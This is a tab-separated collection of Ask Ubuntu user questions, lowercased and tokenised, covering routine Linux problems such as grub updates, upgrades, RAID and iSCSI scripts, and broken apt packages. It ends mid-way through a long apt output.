422493	sudo update-grub problem	to say i am new to linux would be an understatement ( i 've had ubuntu 13.04 installed for about 5 hours ) , so bear with me . i was having some issues with not being able to change the back light on my laptop , and after several attempted fixes still have n't gotten anywhere , but right now my issue is this : when i try to use the sudo update-grub command , i get this in return : /usr/sbin/grub-mkconfig : 34 : /etc/defaut.grub : logout : not found i assume i unwittingly changed something of importance , as it was updating fine a short time ago , but i am not sure how to fix it ?
422495	restoring with deja dup program	i 'm running ubuntu 12.04 and i 've been using the default deja dup program for weekly backups , which i store in a separate disk . my question is this : if i wanted to perform a restore using this program , would i just select the folder containing all of the difftar.gz files and it will restore all of my data ? a hypothetical situation would be if i were to install ubuntu on a new computer , would i be able to bring my data up from the folder created by the backup ?
422498	how to install ubuntu on oracle virtual box	could not install ubuntu on oracle vb as when ever i start my vm , it is asking me to choose try/install . i tried resetting virtual box and installed ubuntu 12.04 lts atleast 5 times .
422506	how to jump to file in folder based on starting letter	let say i have a folder with several subfolders how can i quickly select the folder natur . in os x i can just hit n on my keyboard and it jumps to natur . what is the equivalent in ubuntu ?
422507	connection problem after upgrading to 13.10	i upgrade my ubuntu 12.10 to ubuntu 13.10 by terminal command . and after upgrading i noticed some problem in my ubuntu . the most important thing is , i can not connect to the internet neither by wifi or wired connection . i found some help here but all of them dose n't work for my system . i would be thankfull if some body help me to fix it .
422509	cleanup after upgrade server 13.04 to 13.10	still new to ubuntu here and trying to run a server ( dhcpd and bind9 for starters ) . i installed back when 13.04 came out , today i upgraded to 13.10 . because dhcpd and bind9 are my points of interest right now , after upgrade i went to check if they work . first of all i did service -- status-all and to my surprise , isc-dhcp-server showed [ - ] ( not running ) while bind9 showed a [ + ] . i then entered ps ax | grep dhcpd and got this in response : 2143 ? ss 0:00 dhcpd -user dhcpd -group dhcpd -f -q -4 -pf /run/dhcp-server/dhcpd.pid -cf /etc/dhcp/dhcpd.conf eth0 2201 pts/0 s+ 0:00 grep -- color=auto dhcpd and of course i checked syslog to see if it actually leases addresses , and it does . next thing of interest was , when i looked up possible causes here on askubuntu , i found this post - op shows his output of commands ls -l /etc/init.d/ ls -l /etc/init and he 's got it showing that dhcpd is an upstart job , while i got it as normal service without it being upstart : kitet @ silica : ~ $ ls -l /etc/init.d | grep dhcp -rwxr-xr-x 1 root root 2799 aug 27 00:24 isc-dhcp-server i also checked what files currently are installed by isc-dhcp-server and got this in response : kitet @ silica : ~ $ dpkg -l isc-dhcp-server / . /usr /usr/sbin /usr/sbin/dhcpd /usr/share /usr/share/man /usr/share/man/man8 /usr/share/man/man8/dhcpd.8.gz /usr/share/man/man5 /usr/share/man/man5/dhcpd.conf.5.gz /usr/share/man/man5/dhcpd.leases.5.gz /usr/share/lintian /usr/share/lintian/overrides /usr/share/lintian/overrides/isc-dhcp-server /usr/share/doc /usr/share/doc/isc-dhcp-server /usr/share/doc/isc-dhcp-server/examples /usr/share/doc/isc-dhcp-server/examples/dhcpd.conf /usr/share/doc/isc-dhcp-server/copyright /usr/share/doc/isc-dhcp-server/news.debian.gz /usr/share/apport /usr/share/apport/package-hooks /usr/share/apport/package-hooks/isc-dhcp-server.py /etc /etc/dhcp /etc/dhcp/dhcpd.conf /etc/apparmor.d /etc/apparmor.d/usr.sbin.dhcpd /etc/apparmor.d/dhcpd.d /etc/init /etc/init/isc-dhcp-server6.conf /etc/init/isc-dhcp-server.conf /etc/init.d /etc/init.d/isc-dhcp-server /var /var/run /var/lib /var/lib/dhcp /usr/share/doc/isc-dhcp-server/readme.debian /usr/share/doc/isc-dhcp-server/changelog.debian.gz there 's a file /etc/init/isc-dhcp-server.conf which looks like an upstart job config , because it has start on and stop on in it . there also is /etc/init.d/isc-dhcp-server which is what ? question : what does it all mean ? do i actually have two of them ? one being a stopped service and one an upstart job ? do i need to clean up something after upgrade ? sorry about these q 's , i 'm still trying to grasp where are all the files are located .
422510	ubuntu server newer version than 8.04 on ibm xseries 225 8649	it was installed 8.04 ok. but since its no longer supported , i want to upgrade into newer version . i 've tried 9.10 , 10.04 , until the last one was 12.04. when trying normal boot : on 10.04 and 12.04 , the installation went excellent . nothing wrong . perfect ! but when rebooted , it 's just blank . when trying recovery mode on 10.04 , when its succeed ( it shows command prompt when i choose root ) on 12.04 , it says something like : '' alert ! /dev/disk/by-uuid/random-number-and-alphabet does not exist '' some screenshots ( my reputation is under 10 , so i cant include screenshots , sorry ) : error msg : http : //i.stack.imgur.com/f6aai.jpg scsi disk : http : //i.stack.imgur.com/4calq.jpg note : -the disk is scsi u320 -i 'm noob , so please be patient . thanks ...
422512	send play/pause command to android phone via bluetooth	i 've set up my ubuntu lts as a bluetooth a2dp receiver for my android phone . it works well . i would like to control music player on my phone via bluetooth as well . so are there any tools to send play/pause/up/down/next command to my phone ? so the idea is to emulate bluetooth headset buttons from the command line/script .
422513	i am getting black screen on unity ( ubuntu 13.10 )	i had forced shutdown my computer , when i turned it on , boot droped to a ( initramfs ) prompts/busybox . i 've solved that problem with help of this post after login screen my screen turned black i 've tried to fix that this , but it solved problem only temporary . i tried to purge fglrx like this , taht only made problem worse . now my screen in unity is black and other user interface are black or extremely slow .
422514	bash script fault creating mdadm array	i am working on a script to create md1 array , first to check if the array exist if not it will create it . i get command as command mdadm not found and a few others . the script wont run . # ! /bin/bash check= '' proc/mdstat | grep md1 '' if [ -e $ check ] ; then { echo `` md1 is already here '' } else { mdadm -- create -- verbose /dev/md1 -- level=5 -- raid-devices=3 /dev/sdc1 /dev/sdd1 /dev/sde1 -- spare-devices=1 /dev/sdf1 < < eof yes eof if [ $ ? -eq 0 ] ; then echo `` md1 was created '' elif [ $ ? -ne 0 ] ; then echo `` a fault has occured '' fi } fi
422515	interupting upgrade from 13.04 to 13.10	i updated from 13.04 to 13.10 last night , but had a power interruption . it had got through downloading everything and was installing when it happened . when i rebooted it did n't continue the update , the help dialog now says i have 13.10 and apt-get dist-upgrade says everything is up to date . will everything have installed ? or do i now have a half upgraded system ? am i likely to have any problems and what happens when i upgrade to 14.04 ? marcus
422516	apt-get install unmet debendencies	i am trying to install htop through apt-get install htop but i get following error some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libc6-dev : breaks : gcc-4.4 ( < 4.4.6-4 ) but 4.4.3-4ubuntu5 is to be installed e : broken packages i 've tried to install with -f param , but without success , i 've got same error . how to solve this ? solved i 've solved it , for some reason i 've had debian unstable repo source enabled on the server . commenting the line helped .
422518	disable vibration when pressing key on ubuntu touch	i just installed ubuntu touch on my android nexus 4 . seems promising but there is not so much settings in the ui . one annoying thing is this vibration when touching the screen : can we disable that ? i guess there must be a way to configure the device outside of the setting screen , right ? u
422523	writing a script to handle iscsi	i am currently writing a script that ( atleast in theory ) should install and add changes in config on iscsitarget , but i keep getting an error that i ca n't seem to figure out the origin of . the errors being : line 39 : $ ' [ \302\240-e ' : command not found . mv : can not stat `/etc/iet/ietd.conf ' : no such file or directory . here is the code so far : # ! /bin/bash conf= '' /etc/default/iscsitarget . '' login= '' /etc/iet/ietd.conf.back '' # dette skjekker om bruker er root if [ [ $ euid -ne 0 ] ] ; then echo `` du må være root for å kjøre dette scriptet . '' exit 1 fi # skjekker om iscsi target er innstallert dpkg -s `` iscsitarget '' > /dev/null 2 > & 1 & & { echo `` iscsi target er allerede innstallert . '' } || { echo `` innstallerer iscsi target ... '' aptitude -y install iscsitarget } # her tar vi konfigurasjons filen til og gjør en backup av den if [ -e `` $ conf '' ] then echo `` $ conf eksisterer , backup er unødvendig . '' else mv /etc/default/iscsitarget /etc/default/iscsitarget.back echo `` backup av konfigurasjonsfilen er tatt . '' fi # her lager vi en ny konfigurasjonsfil til iscsi cat > /etc/default/iscsitarget < < `` eof '' iscsitarget_enable=true eof echo `` konfigurasjonsfil oppdatert ! '' # backup av login fil og login til iscsitarget if [ -e `` $ login '' ] then echo `` $ login eksisterer , backup er unødvendig . '' else mv /etc/iet/ietd.conf /etc/iet/ietd.conf.back echo `` backup av konfigurasjonsfil er tatt . '' fi sort of new to this , thanks !
422525	how do you recover item from lost+found ?	my /home partition usually contain two folders , one is named after my username and the second is lost+found . somehow my folder named my username which contain all my files disappear , but i can find the content of it on lost+found folder . unfortunately everything i can do is browse through them , i ca n't copy that file . how do you recover lost files from lost+found ?
422528	what is the best stable ppa for nouveau ?	i 'm using ubuntu 12.04 and i want to know if there are stable and updated ppas for nouveau that provide bug fixes or should i stick to default ? maybe somebody uses those ppas with nouveau and can advise something .
422531	ubuntu 13.10 slow on initial startup , fine on subsequent restart	recently my 13.10 installation has developed a fault where the keyboard and mouse is really laggy on initial startup on a subsequent restart the problem goes away i assume it is a usb issue not sure how to approach fixing a problem of this nature
422534	why do games in windows have better fps than in ubuntu ?	when i had windows 7 on my samsung r870 ( intel i3 and nvidia geforce gt 330m ) , games like team fortress 2 ( via steam ) ran really smoothly , but when i downloaded and installed ubuntu and ubuntu studio , the game runs fairly smoothly for about 15 minutes then my laptop completely turns off . why is this the case ? i have also installed the correct graphics driver .
422536	is there a way to uninstall everything but the ubuntu os ? i want to clean my virtual machine,	i wonder if there is a command which cleans my virtual machine completely , by removing everything but the operating system . and no i dont prefer to create a new one and delete the old one completely .
422540	crontab gui for ubuntu 12.04	is there any app for the ubuntu 12.04 lts ( server , no visual interface ) in order to easily manage crontab ? maybe a daemon running in background and access to it via a web browser ? using crontab -e is not working anymore for me because i have over 100 lines with crons .
422541	how to access hostspot in moblie phone ?	is is possible to access hotspot in mobile phone or not ? after i start hotspot from my laptop , the hotspot id is shown in the mobile while i refresh for the available wifi 's but it never gets connected . `` i am a ubuntu13.10 user.i use samsung galaxy note ''
422542	grub window is not displayed	i have installed ubuntu 12.04 ts version in to my computer and burnt the iso image in a dvd . i followed the instructions of how to install ubuntu 12 as a dual boot in windows 7 . 1 ) installed ubuntu 12.04 in windows through cd note : during the ubuntu installation , there comes a window which asks to do partition of the space , it provides a mover . user can move left or right and automatically the space in bytes shows up we dint do anything here . we left it untouched . ( have doubts whether this has created problems ) . we thought system will take it in a standard way . 2 ) it says installation is successful . we took out the cd 3 ) when we restart , i am not getting the window to select the os ( first problem ) 4 ) after some time , it takes me to ubuntu screen 5 ) in the username/ password window , most of the times , system hangs and i will get a drum sound ( second problem ) 6 ) very few times , i get a chance to type my username and password and i will be taken to ubuntu 7 ) but , where is windows os ? how can i get back to windows ? what should i do to fix this problem ?
422543	what does jetty do and do i need to activate it ?	what does jetty really do ? i 've read a lot of info about jetty googling but everywhere it 's just a few info about it . because once or twice i got pop up message saying : not starting jetty - edit /etc/default/jetty and change no_start to be 0 by default it is set to 1 on my system , here 's the part of jetty log : defaults for jetty see /etc/init.d/jetty for more change to 0 to allow jetty to start no_start=1 so do i need to change it to zero or is it recommended also and what will it affect ?
422546	ubuntu 14.04 - will there be an option to upgrade from 32 bit to 64 bit	will there be an option in the new ubuntu 14.04 release to migrate from a 32bit to 64bit version of ubuntu ? seems like many users require this functionality in a supported way without doing a fresh install .
422547	screen shot from command line	i am writing a sh file to take screen short and want to schedule in crontab but when i run the .sh file it run ok no problem happens but when try to schedule it in crontab i got an error like import : unable to open x server ` ' @ error/import.c/importimagecommand/366 . my .sh file is like # ! /bin/bash filename='abc' import -window root $ home/desktop/ $ filename.png any idea how to solve it i tried with which import it is showing /usr/bin/
422548	change pdf viewer for downloads in chromium browser	i am using ubuntu 12.04 and chromium browser version 32.0.1700.102 . when i download pdf files in chromium i get a button in the bottom left corner of the window , like this : if i click the button , the pdf file is opened in evince . how can i change that to another pdf viewer , like okular ?
422549	dell inspiron 14 3521 wireless problem	i am using dell inspiron 15 3521 and installed ubuntu on it . unfortunately i am not able to use wireless on the laptop . it is not showing any wireless adapter or wireless connection . please help
422550	error formatting pendrive	in ubuntu 12.04 using disk utility while formatting , there was an error error creating partition table : helper exited with exit code 1 : error calling fsync ( 2 ) on /dev/sdc : input/output error i tried to format even using windows failed and showed up `` windows coud n't format '' . how can i fix this ?
422551	ecryptfs-recover-private : input/output error	i tried to recover data from a disk which i removed from a non-functional laptop . the disk is in a usb enclosure , and i plugged it into another laptop running the same ubuntu version ( 12.04 ) as the old one . ecryptfs-recover-private worked fine and my encrypted data from the external disk were accessible in /tmp/ecryptfs i started copying data ( about 3 gb ) and during this copy operation the laptop went into a strange state - running , but not accessible any more . no desktop visible , no unlock screen , nothing . after more than an hour this had not changed , so i switched off the laptop by pressing the power button long enough ( with the external disk still usb-mounted ) . after rebooting , ecryptfs-recover-private worked as before , i can once again `` see '' the data in /tmp/ecryptfs , but any cp command trying to access one or more unencrypted files fails with cp : can not open `/tmp/ecryptfs.ky6l8vwt/myfile.pdf ' for reading : input/output error from fsck output , the external disk looks ok to me . below are the last lines from /var/log/syslog - can i deduce any options from this ? feb 18 11:56:42 ubuntu kernel : [ 12370.976255 ] usb 1-1 : new high-speed usb device number 6 using ehci-pci feb 18 11:56:42 ubuntu kernel : [ 12371.111656 ] usb 1-1 : new usb device found , idvendor=05e3 , idproduct=0731 feb 18 11:56:42 ubuntu kernel : [ 12371.111669 ] usb 1-1 : new usb device strings : mfr=0 , product=1 , serialnumber=2 feb 18 11:56:42 ubuntu kernel : [ 12371.111676 ] usb 1-1 : product : usb storage feb 18 11:56:42 ubuntu kernel : [ 12371.111682 ] usb 1-1 : serialnumber : 0000000000000033 feb 18 11:56:42 ubuntu kernel : [ 12371.112357 ] usb-storage 1-1:1.0 : usb mass storage device detected feb 18 11:56:42 ubuntu kernel : [ 12371.113325 ] scsi4 : usb-storage 1-1:1.0 feb 18 11:56:42 ubuntu mtp-probe : checking bus 1 , device 6 : `` /sys/devices/pci0000:00/0000:00:1d.7/usb1/1-1 '' feb 18 11:56:42 ubuntu mtp-probe : bus : 1 , device : 6 was not an mtp device feb 18 11:56:43 ubuntu kernel : [ 12372.114247 ] scsi 4:0:0:0 : direct-access toshiba mk1229gsg ps11 pq : 0 ansi : 0 feb 18 11:56:43 ubuntu kernel : [ 12372.114944 ] sd 4:0:0:0 : attached scsi generic sg2 type 0 feb 18 11:56:43 ubuntu kernel : [ 12372.115489 ] sd 4:0:0:0 : [ sdb ] 234441644 512-byte logical blocks : ( 120 gb/111 gib ) feb 18 11:56:43 ubuntu kernel : [ 12372.117632 ] sd 4:0:0:0 : [ sdb ] write protect is off feb 18 11:56:43 ubuntu kernel : [ 12372.117643 ] sd 4:0:0:0 : [ sdb ] mode sense : 03 00 00 00 feb 18 11:56:43 ubuntu kernel : [ 12372.118974 ] sd 4:0:0:0 : [ sdb ] no caching mode page found feb 18 11:56:43 ubuntu kernel : [ 12372.118984 ] sd 4:0:0:0 : [ sdb ] assuming drive cache : write through feb 18 11:56:43 ubuntu kernel : [ 12372.123212 ] sd 4:0:0:0 : [ sdb ] no caching mode page found feb 18 11:56:43 ubuntu kernel : [ 12372.123219 ] sd 4:0:0:0 : [ sdb ] assuming drive cache : write through feb 18 11:56:43 ubuntu kernel : [ 12372.174644 ] sdb : sdb1 sdb2 < sdb5 > feb 18 11:56:43 ubuntu kernel : [ 12372.178735 ] sd 4:0:0:0 : [ sdb ] no caching mode page found feb 18 11:56:43 ubuntu kernel : [ 12372.178747 ] sd 4:0:0:0 : [ sdb ] assuming drive cache : write through feb 18 11:56:43 ubuntu kernel : [ 12372.178756 ] sd 4:0:0:0 : [ sdb ] attached scsi disk feb 18 11:56:43 ubuntu ata_id [ 8056 ] : hdio_get_identity failed for '/dev/sdb ' : invalid argument feb 18 11:56:44 ubuntu kernel : [ 12373.371575 ] ext4-fs ( sdb1 ) : mounted filesystem with ordered data mode . opts : ( null ) feb 18 11:58:34 ubuntu kernel : [ 12483.176217 ] ecryptfs_init_crypt_ctx : cryptfs : init_crypt_ctx ( ) : error initializing cipher [ aes ] feb 18 11:58:34 ubuntu kernel : [ 12483.176230 ] ecryptfs_parse_packet_set : error parsing tag 3 packet feb 18 11:58:34 ubuntu kernel : [ 12483.176240 ] valid ecryptfs headers not found in file header region or xattr region , inode 4459351 feb 18 11:59:51 ubuntu wpa_supplicant [ 1072 ] : wpa : group rekeying completed with 00:1a:4f:8d : b6 : f3 [ gtk=tkip ]
422556	problem with internal sdd disk	i have an ideapad y510p . it comes with an 24gb ssd , and one 1tb hard disk . i had to install linux mint twice in this computer . during my first installation of linux i put /boot and /home in the 24gb ssd and use the 1tb disk for everything else . everything was working smoothly until i begin to notice that the latest nvidia driver ( the one that was released few days ago ) was not working properly . even the cuda compiler ( nvcc ) was not producing correct results . then i decided to install linux again ( once you know how to do it , is really simple ) . here comes my problem . for this second installation , i lost control of the 24gb sdd . i can see that the disk is there , but i can not access it . the linux installation program fails it it tries to access it . i had no other choice than to install linux on the 1tb hard disk . now linux is running , but i can not use the 24gb sdd . have anyone experience something similar ? is there any trick to format/partition an sdd drive ? so far i have tried to use `` disk '' and `` gparted '' without any luck . thanks for reading , and thanks in advance for any help .
422562	install not as root	i currently have a process that does sudo apt-get on a large number of files , sudo make install and the like . is there a simple way to use these scripts when i do not have root access ?
422564	what are the diffences between the packages selinux and selinux-basics ?	there are two package for selinux : selinux and selinux-basics . what difference exist between them ?
422566	apt-get : you have held broken packages	everything was working normally , but now libstdc++ seems to be broken . so i try to reinstall it . things like : sudo apt-get remove stdc++ sudo apt-get autoclean sudo apt-get -f install sudo apt-get -u dist-upgrade do n't help . and what i have : $ sudo apt-get install stdc++ reading package lists ... done building dependency tree reading state information ... done note , selecting 'libsfstdc++6-dbg-armhf-dcv1 ' for regex 'stdc+' note , selecting 'libstdc++6-4.7-dbg-arm64-cross ' for regex 'stdc+' note , selecting 'libstdc++5-dbg-armhf-cross ' for regex 'stdc+' note , selecting 'libstdc++6-4.7-pic-arm64-cross ' for regex 'stdc+' note , selecting 'libstdc++6-4.8-dbg-armhf-cross ' for regex 'stdc+' note , selecting 'libx32stdc++6-4.4-dbg ' for regex 'stdc+' note , selecting 'libstdc++6-powerpc-dcv1 ' for regex 'stdc+' note , selecting 'xstdcmap ' for regex 'stdc+' note , selecting 'libstdc++6-dbg-armel-cross ' for regex 'stdc+' note , selecting 'libstdc++-4.8-dev ' for regex 'stdc+' note , selecting 'libstdc++6-arm64-dcv1 ' for regex 'stdc+' note , selecting 'libsfstdc++6-4.7-dev-armhf-cross ' for regex 'stdc+' note , selecting 'lib64stdc++6-powerpc-cross ' for regex 'stdc+' note , selecting 'libstdc++6-pic-arm64-dcv1 ' for regex 'stdc+' note , selecting 'libstdc++6-4.8-dbg-powerpc-cross ' for regex 'stdc+' note , selecting 'libstdc++6-4.5-dbg ' for regex 'stdc+' note , selecting 'libx32stdc++-4.8-dev ' for regex 'stdc+' note , selecting 'libstdc++6-dbg-arm64-dcv1 ' for regex 'stdc+' note , selecting 'lib64stdc++6-4.3-dbg-powerpc-cross ' for regex 'stdc+' note , selecting 'libstdc++6-4.7-pic-powerpc-cross ' for regex 'stdc+' note , selecting 'libstdc++6-4.7-dev-arm64-cross ' for regex 'stdc+' note , selecting 'libstdc++6-4.2-dbg-arm64-cross ' for regex 'stdc+' note , selecting 'lib32stdc++6-4.4-dbg ' for regex 'stdc+' note , selecting 'libstdc++6-dev-armel-dcv1 ' for regex 'stdc+' note , selecting 'lib64stdc++6-4.0-dbg ' for regex 'stdc+' note , selecting 'libstdc++6-4.3-dbg-armhf-cross ' for regex 'stdc+' note , selecting 'lib64stdc++6-4.6-dbg ' for regex 'stdc+' note , selecting 'libstdc++6-4.1-dbg-powerpc-cross ' for regex 'stdc+' note , selecting 'libstdc++6-4.4-dbg-armel-cross ' for regex 'stdc+' note , selecting 'lib64stdc++6-dbg-powerpc-cross ' for regex 'stdc+' note , selecting 'libstdc++-4.8-pic-powerpc-cross ' for regex 'stdc+' note , selecting 'libstdc++6-4.4-doc ' for regex 'stdc+' note , selecting 'libstdc++5-dbg-powerpc-cross ' for regex 'stdc+' note , selecting 'lib32stdc++6 ' for regex 'stdc+' note , selecting 'libstdc++6-4.7-pic ' for regex 'stdc+' note , selecting 'libstdc++6-dbg-arm64-cross ' for regex 'stdc+' note , selecting 'libstdc++-pic-armhf-dcv1 ' for regex 'stdc+' note , selecting 'libstdc++5-3.3-dbg ' for regex 'stdc+' note , selecting 'libx32stdc++6-dbg ' for regex 'stdc+' note , selecting 'lib64stdc++-4.8-dev-powerpc-cross ' for regex 'stdc+' note , selecting 'libx32stdc++6-4.5-dbg ' for regex 'stdc+' note , selecting 'libstdc++-dev-powerpc-cross ' for regex 'stdc+' note , selecting 'libstdc++-dev-powerpc-dcv1 ' for regex 'stdc+' note , selecting 'libstdc++6-4.7-dbg-powerpc-cross ' for regex 'stdc+' note , selecting 'libstdc++-dev-armel-cross ' for regex 'stdc+' note , selecting 'libstdc++-4.8-doc ' for regex 'stdc+' note , selecting 'libstdc++6-4.0-dbg ' for regex 'stdc+' note , selecting 'libhfstdc++6-dbg-armel-dcv1 ' for regex 'stdc+' note , selecting 'libhfstdc++6-armel-cross ' for regex 'stdc+' note , selecting 'libstdc++6-4.6-dbg ' for regex 'stdc+' note , selecting 'lib64stdc++6-4.2-dbg-powerpc-cross ' for regex 'stdc+' note , selecting 'lib32stdc++6-dbg ' for regex 'stdc+' note , selecting 'libstdc++-4.8-pic-armhf-cross ' for regex 'stdc+' note , selecting 'libstdc++6-4.4-dbg-arm64-cross ' for regex 'stdc+' note , selecting 'libstdc++5-3.3-dbg-armel-cross ' for regex 'stdc+' note , selecting 'lib32stdc++6-4.5-dbg ' for regex 'stdc+' note , selecting 'libstdc++6-4.5-dbg-armhf-cross ' for regex 'stdc+' note , selecting 'lib64stdc++6-4.1-dbg ' for regex 'stdc+' note , selecting 'libstdc++6-4.0-dbg-powerpc-cross ' for regex 'stdc+' note , selecting 'lib64stdc++6-dbg-powerpc-dcv1 ' for regex 'stdc+' note , selecting 'lib64stdc++6-4.7-dbg ' for regex 'stdc+' note , selecting 'libstdc++6-4.6-dbg-armel-cross ' for regex 'stdc+' note , selecting 'libstdc++6-4.6-dev ' for regex 'stdc+' note , selecting 'libstdc++6-dbg-powerpc-dcv1 ' for regex 'stdc+' note , selecting 'libstdc++-pic-powerpc-dcv1 ' for regex 'stdc+' note , selecting 'libstdc++6-4.5-doc ' for regex 'stdc+' note , selecting 'lib64stdc++6-4.8-dbg-powerpc-cross ' for regex 'stdc+' note , selecting 'libstdc++6-armhf-cross ' for regex 'stdc+' note , selecting 'libstdc++-4.8-dev-armhf-cross ' for regex 'stdc+' note , selecting 'libx32stdc++6-4.0-dbg ' for regex 'stdc+' note , selecting 'libstdc++-dev-arm64-cross ' for regex 'stdc+' note , selecting 'lib32stdc++-4.8-dev ' for regex 'stdc+' note , selecting 'libx32stdc++6-4.6-dbg ' for regex 'stdc+' note , selecting 'libstdc++6-4.6-dbg-powerpc-cross ' for regex 'stdc+' note , selecting 'libstdc++6-4.0-dbg-armhf-cross ' for regex 'stdc+' note , selecting 'libstdc++6-dev-arm64-dcv1 ' for regex 'stdc+' note , selecting 'lib64stdc++6-4.1-dbg-powerpc-cross ' for regex 'stdc+' note , selecting 'libstdc++6-4.1-dbg ' for regex 'stdc+' note , selecting 'libstdc++6-4.1-dbg-armel-cross ' for regex 'stdc+' note , selecting 'libstdc++5-3.3-dbg-arm64-cross ' for regex 'stdc+' note , selecting 'libstdc++6-4.7-dbg ' for regex 'stdc+' note , selecting 'libhfstdc++6-4.7-dbg-armel-cross ' for regex 'stdc+' note , selecting 'libstdc++5-3.3-doc ' for regex 'stdc+' note , selecting 'libstdc++6-4.6-dbg-arm64-cross ' for regex 'stdc+' note , selecting 'pd-libstdcpp ' for regex 'stdc+' note , selecting 'lib32stdc++6-4.0-dbg ' for regex 'stdc+' note , selecting 'libstdc++6-4.7-dbg-armhf-cross ' for regex 'stdc+' note , selecting 'libstdc++6-4.7-pic-armhf-cross ' for regex 'stdc+' note , selecting 'lib32stdc++6-4.6-dbg ' for regex 'stdc+' note , selecting 'lib64stdc++6-4.2-dbg ' for regex 'stdc+' note , selecting 'libstdc++5-dbg-armel-cross ' for regex 'stdc+' note , selecting 'libstdc++6-powerpc-cross ' for regex 'stdc+' note , selecting 'libstdc++5-dbg ' for regex 'stdc+' note , selecting 'libstdc++3.0-dev ' for regex 'stdc+' note , selecting 'libstdc++6-4.7-dev ' for regex 'stdc+' note , selecting 'libstdc++6-pic-powerpc-dcv1 ' for regex 'stdc+' note , selecting 'lib64stdc++6-4.7-dbg-powerpc-cross ' for regex 'stdc+' note , selecting 'libstdc++6-4.0-doc ' for regex 'stdc+' note , selecting 'libstdc++6-4.6-doc ' for regex 'stdc+' note , selecting 'libstdc++-dev-armhf-dcv1 ' for regex 'stdc+' note , selecting 'libhfstdc++6-4.7-dev-armel-cross ' for regex 'stdc+' note , selecting 'lib64stdc++6-powerpc-dcv1 ' for regex 'stdc+' note , selecting 'libx32stdc++6-4.1-dbg ' for regex 'stdc+' note , selecting 'libstdc++6-4.7-dev-armhf-cross ' for regex 'stdc+' note , selecting 'libstdc++6-4.5-dbg-powerpc-cross ' for regex 'stdc+' note , selecting 'libstdc++6-4.1-dbg-arm64-cross ' for regex 'stdc+' note , selecting 'libx32stdc++6-4.7-dbg ' for regex 'stdc+' note , selecting 'libstdc++6-4.2-dbg-armhf-cross ' for regex 'stdc+' note , selecting 'lib64stdc++6-4.0-dbg-powerpc-cross ' for regex 'stdc+' note , selecting 'libstdc++-pic-arm64-dcv1 ' for regex 'stdc+' note , selecting 'libsfstdc++6-4.8-dbg-armhf-cross ' for regex 'stdc+' note , selecting 'libstdc++6-4.3-dbg-armel-cross ' for regex 'stdc+' note , selecting 'libstdc++6-4.2-dbg ' for regex 'stdc+' note , selecting 'libstdc++6-4.8-dbg ' for regex 'stdc+' note , selecting 'libstdc++5-3.3-dbg-powerpc-cross ' for regex 'stdc+' note , selecting 'libstdc++5-dbg-arm64-cross ' for regex 'stdc+' note , selecting 'libstdc++6-4.8-dbg-arm64-cross ' for regex 'stdc+' note , selecting 'libstdc++6-dbg-armhf-cross ' for regex 'stdc+' note , selecting 'libx32stdc++6-4.7-dev ' for regex 'stdc+' note , selecting 'lib64stdc++6-dbg ' for regex 'stdc+' note , selecting 'lib32stdc++6-4.1-dbg ' for regex 'stdc+' note , selecting 'libstdc++-dev-armel-dcv1 ' for regex 'stdc+' note , selecting 'lib32stdc++6-4.7-dbg ' for regex 'stdc+' note , selecting 'lib64stdc++6-4.3-dbg ' for regex 'stdc+' note , selecting 'lib64stdc++6-4.6-dbg-powerpc-cross ' for regex 'stdc+' note , selecting 'libstdc++6-dbg ' for regex 'stdc+' note , selecting 'libstdc++6-4.1-doc ' for regex 'stdc+' note , selecting 'libstdc++6-4.7-doc ' for regex 'stdc+' note , selecting 'libstdc++6-4.4-pic ' for regex 'stdc+' note , selecting 'libstdc++-dev ' for regex 'stdc+' note , selecting 'libstdc++6-armhf-dcv1 ' for regex 'stdc+' note , selecting 'libstdc++6-4.4-dbg-powerpc-cross ' for regex 'stdc+' note , selecting 'lib32stdc++6-4.7-dev ' for regex 'stdc+' note , selecting 'libstdc++6-pic-armhf-dcv1 ' for regex 'stdc+' note , selecting 'libx32stdc++6-4.2-dbg ' for regex 'stdc+' note , selecting 'libstdc++6-4.3-dbg-arm64-cross ' for regex 'stdc+' note , selecting 'libstdc++6-dbg-armhf-dcv1 ' for regex 'stdc+' note , selecting 'libstdc++6-4.7-dev-powerpc-cross ' for regex 'stdc+' note , selecting 'libx32stdc++6-4.8-dbg ' for regex 'stdc+' note , selecting 'libstdc++6-4.4-dbg-armhf-cross ' for regex 'stdc+' note , selecting 'libstdc++2.8-dev ' for regex 'stdc+' note , selecting 'libstdc++5-doc ' for regex 'stdc+' note , selecting 'libstdc++6-4.5-dbg-armel-cross ' for regex 'stdc+' note , selecting 'libstdc++6-dev-powerpc-dcv1 ' for regex 'stdc+' note , selecting 'libstdc++-4.8-pic ' for regex 'stdc+' note , selecting 'libstdc++6-4.3-dbg ' for regex 'stdc+' note , selecting 'libstdc++-4.8-dev-powerpc-cross ' for regex 'stdc+' note , selecting 'libstdc++6-armel-cross ' for regex 'stdc+' note , selecting 'libstdc++2.10-dev ' for regex 'stdc+' note , selecting 'lib32stdc++6-4.2-dbg ' for regex 'stdc+' note , selecting 'libstdc++6-armel-dcv1 ' for regex 'stdc+' note , selecting 'lib64stdc++6-4.5-dbg-powerpc-cross ' for regex 'stdc+' note , selecting 'lib32stdc++6-4.8-dbg ' for regex 'stdc+' note , selecting 'libstdc++-dev-armhf-cross ' for regex 'stdc+' note , selecting 'libstdc++6-pic-armel-dcv1 ' for regex 'stdc+' note , selecting 'lib64stdc++6-4.4-dbg ' for regex 'stdc+' note , selecting 'libstdc++6-dbg-armel-dcv1 ' for regex 'stdc+' note , selecting 'libhfstdc++6-armel-dcv1 ' for regex 'stdc+' note , selecting 'libsfstdc++6-armhf-dcv1 ' for regex 'stdc+' note , selecting 'libstdc++6-4.2-doc ' for regex 'stdc+' note , selecting 'libstdc++6-4.0-dbg-armel-cross ' for regex 'stdc+' note , selecting 'libstdc++6-4.3-dbg-powerpc-cross ' for regex 'stdc+' note , selecting 'libstdc++-4.8-pic-arm64-cross ' for regex 'stdc+' note , selecting 'libstdc++5-3.3-dbg-armhf-cross ' for regex 'stdc+' note , selecting 'libstdc++6-4.5-dbg-arm64-cross ' for regex 'stdc+' note , selecting 'libx32stdc++6-4.3-dbg ' for regex 'stdc+' note , selecting 'libstdc++6-4.6-dbg-armhf-cross ' for regex 'stdc+' note , selecting 'libx32stdc++6 ' for regex 'stdc+' note , selecting 'libstdc++-dev-arm64-dcv1 ' for regex 'stdc+' note , selecting 'libstdc++2.9-dev ' for regex 'stdc+' note , selecting 'libstdc++6-4.7-dbg-armel-cross ' for regex 'stdc+' note , 